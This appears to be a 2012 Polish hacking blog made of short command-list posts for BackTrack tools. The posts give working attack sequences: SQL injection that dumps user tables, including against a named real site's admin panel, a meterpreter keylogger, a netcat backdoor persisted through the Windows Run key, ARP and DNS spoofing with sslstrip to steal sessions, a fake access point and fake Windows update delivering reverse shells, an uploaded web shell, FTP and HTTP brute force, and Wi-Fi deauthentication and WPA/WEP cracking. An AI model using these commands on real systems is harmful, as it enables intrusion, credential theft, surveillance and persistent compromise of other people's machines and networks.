poniedziałek, 9 kwietnia 2012

Advanced sql injection (5 sposobow jak przejac kontrole nad strona www)

havij | manual | mms_05.jar | DarkMySQLi | sqlmap
download podatnego systemu cms do pobrania z tad
http://www.exploit-db.com/exploits/18708/
1. havij
download
http://itsecteam.com/en/projects/project1_page2.htm
2. manual
http://192.168.1.102/GENU-2012.3/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--
3. mms_05.jar
download
http://www.scrt.ch/en/attack/downloads/mini-mysqlat0r
java -jar mms_05.jar
http://192.168.1.104/GENU-2012.3/
4. DarkMySQLi
cd /pentest/web/darkmysqli
python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" --findcol

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" --dbs

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" --full

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" -D baza -T genu_users -C user_name,user_password --dump

5. sqlmap
cd /pentest/database/sqlmap/
python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" --dbs

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza --tables

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza -T genu_users --columns

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza -T genu_users -C user_email,user_name,user_password --dump

GAME OVER

niedziela, 1 kwietnia 2012

środa, 28 marca 2012

meterpreter keyloger and upload backdoor

keyloger i netcat
Komendy:
KEYLOGER
migrate (pid explorer.exe)
keyscan_start
keyscan_dump(opcjonalnie cala siec)
keyscan_stop
UPLOAD BACKDORS nc.exe
cd /pentest/windows-binaries/tools/
cp nc.exe /root/Desktop/(opcjonalnie)
upload /root/nc.exe C:\\WINDOWS\\SYSTEM32 dla win 7 ustawiamy przywileje
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v test -d 'C:\WINDOWS\SYSTEM32\nc.exe -L -d -p 4444 -e cmd'
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(opcjonalnie sprawdzamy czy wszystko jest ok
nc ip_hosta port
GAME OVER

poniedziałek, 26 marca 2012

hamster + ferret

czyli co słychać u sąsiada ;)
Komendy:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan1 -t 192.168.1.107 192.168.1.1
arpspoof -i wlan1 192.168.1.1(opcjonalnie cala siec)
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f
cd /pentest/sniffers/hamster
./ferret -i wlan1
cd /pentest/sniffers/hamster
./hamster -i wlan1
cat /root/sslstrip.log
pamietajcie o zmianie ustawien przegladarki na proxy :D GAME OVER

niedziela, 25 marca 2012

fake ap windows 7 exploit
Komendy:
apt-get install dhcp3-server -y
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
kwrite /etc/dhcp3/dhcpd.conf

ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; subnet 192.168.2.128 netmask 255.255.255.128 { option subnet-mask 255.255.255.128; option broadcast-address 192.168.2.255; option routers 192.168.2.129; option domain-name-servers 8.8.8.8; range 192.168.2.130 192.168.2.140; }

airmon-ng start wlan1
airbase-ng -e "Hotspot" -c 9 mon0
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
/etc/init.d/apache2 start
ifconfig (opcjonalnie)
kwrite /usr/share/ettercap/etter.dns
arpspoof -i at0 192.168.2.129
ettercap -T -q -i at0 -P dns_spoof -M arp // //
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.131
set LPORT 4444
exploit
jak ktos by chcial index.php i ikonke pw na forum :D
GAME OVER

środa, 14 marca 2012

Falszywa Aktualizacja

msfconsole+apache2+ettercap(plugin dns_spoof)
Komendy:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 x > /root/var/www/Windows-KB183905-x86-x64-PL.exe
kwrite /usr/share/ettercap/etter.dns
ettercap -T -q -i wlan0 -P dns_spoof -M arp // //
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.104
set LPORT 4444
exploit
jak ktos by chcial index.php i ikonke pw na forum :D
GAME OVER

SQL map

Automatyczny atak sql injection przy urzyciu sqlmap
Komendy:
cd /pentest/web/scanners/sqlmap
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 --dbs
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -D pjirc_forum --tables
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users --columns
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users -U test --dump
i logujemy sie ;)
p.s
1. Backtrack 5 R1 - sqlmap
cd /pentest/database/sqlmap
video nie moje mam nadzieje ze autor sie nie obrazi a nawet jak sie obrazi to zrobimy nowe zapraszam na youtube channel: ruo911 pozdro

autopwn + PostgreSQL

Automatyczny atak msfcosole
Komendy:
msfconsole
db_status
db_hosts
db_nmap -sS -O 192.168.2.100
db_hosts
db_autopwn -p -r -e
sessions
sessions -i 1
(opcjonalnie) shell,shutdown,run vnc etc.
GAME OVER

wtorek, 13 marca 2012

MDK3

MDK3 wykopywanie usera(ow) z wlasnej sieci :D
Komendy:
iwconfig
airmon-ng start wlan1
airodump-ng mon0
airodump-ng --channel 1 mon0
mdk3 mon0 d -c 1 -b /root/Desktop/mac_urzyszkodnika
GAME OVER

msfconsole haking ftp + bonus weevely (generowanie zaszyfrowanego backdora)

msfconsole + weevely
Komendy:
ifconfig
nmap 192.168.2.*
msfconsole
use auxiliary/scanner/ftp/ftp_login
set USER_FILE Desktop/loginy.lst
set PASS_FILE Desktop/password.lst
set RHOSTS 192.168.2.100
set STOP_ON_SUCCESS true
run
cd /pentest/backdoors/web/weevely
./weevely.py generate 5m4ru /root/Desktop/backdors.php
wysylamy backdora na ftp (w moim przypadku filezilla)
./weevely.py http://192.168.2.100/backdors.php 5m4ru (podajemy scierzke url gdzie znajduje sie nasza furtak powodzenia ! )
GAME OVER

poniedziałek, 12 marca 2012

hydra haking http password

hydra ;)
Komendy:
ifconfig
nmap 192.168.2.*
hydra -L Desktop/loginy.lst -P Desktop/password.lst -f -vV 192.168.2.1 http-get /
GAME OVER

niedziela, 11 marca 2012

sslh4ck.sh

Taki tam skrypt do nabycia u mnie na pw pisac.
Komendy:
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
(opcjonalnie) sudo python ./setup.py install
GAME OVER

Social-engineering-toolkit + ettercap dns spoof

atak java aplet dzieki dns
Komendy:
kwrite /usr/share/ettercap/etter.dns
ettercap -T -q -i wlan0 -P dns_spoof -M arp // //
GAME OVER

czwartek, 8 marca 2012

Armitage

Armitage czyli msfconsole GUI ^^
Komendy:
service mysql start
msfrpcd -f -U msf -P test -t Basic
GAME OVER

msfconsole

metasploit vs windows xp (ms08_067_netapi)
Komendy:
nmap -sS -O 192.168.4.65
msfconsole
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.4.65
set LHOST 192.168.4.53
exploit
GAME OVER
Odzyskiwanie klucza WPA Bruteforce (bezsłownika)
Komendy:
iwconfig
airmon-ng start wlan2
airodump-ng mon0
airodump-ng --bssid xx:xx:xx:xx:xx:xx --channel 1 -w pakiety mon0
aireplay-ng -0 4 -a 00:16:38:44:A5:D1 -c F4:EC:38:91:22:05 mon0
cd /pentest/passwords/crunch/
./crunch 8 8 abcdefghijklmnoprstwvxyz -t what@@@@ | aircrack-ng /root/pakiety-01.cap -e cell -w -
GAME OVER

środa, 7 marca 2012

aircrack-ng WPA

Odzyskiwanie klucza WPA
Komendy:
iwconfig (sprawdzamy jak nazywa się interface naszej kart sieciowej np. wlan0,wlan1 itp.)
airmon-ng start wlan2 (przełączamy kartę w tryb monitoringu w moim przypadku jest to wlan2)
airodump-ng mon0 (patrzymy jakie sieci maja zabezpieczenia zatrzymujemy ctrl+c)
airodump-ng --bssid xx:xx:xx:xx:xx:xx --channel 1 -w pakiety mon0 (--bssid to nic innego jak mac routera a --channel 1 to kanał nr 1 -w zapis pakietów do pliku o nazwie pakiety)
aireplay-ng -0 4 -a 00:16:38:44:A5:D1 -c F4:EC:38:91:22:05 mon0 ( -0 wykopujemy użytkownika z jego własnej sieci -a mac routera -c mac clienta )
aircrack-ng -w Desktop/password.lst *cap ( -w podajemy ścieżkę do słowika z hasłami milej zabawy. )
GAME OVER

aircrack-ng WEP

Odzyskiwanie klucza WEP
Komendy:
iwconfig (sprawdzamy jak nazywa się interface naszej kart sieciowej np. wlan0,wlan1 itp.)
airmon-ng start wlan2 (przełączamy kartę w tryb monitoringu w moim przypadku jest to wlan2)
airodump-ng mon0 (patrzymy jakie sieci maja zabezpieczenia zatrzymujemy ctrl+c)
airodump-ng --bssid xx:xx:xx:xx:xx:xx --channel 1 -w pakiety mon0 (--bssid to nic innego jak mac routera a --channel 1 to kanał nr 1 -w zapis pakietów do pliku o nazwie pakiety)
aircrack-ng *cap (otwieram wszystkie zapisane pakiety z rozszerzeniem cap i zaczyna sie zabawa)
GAME OVER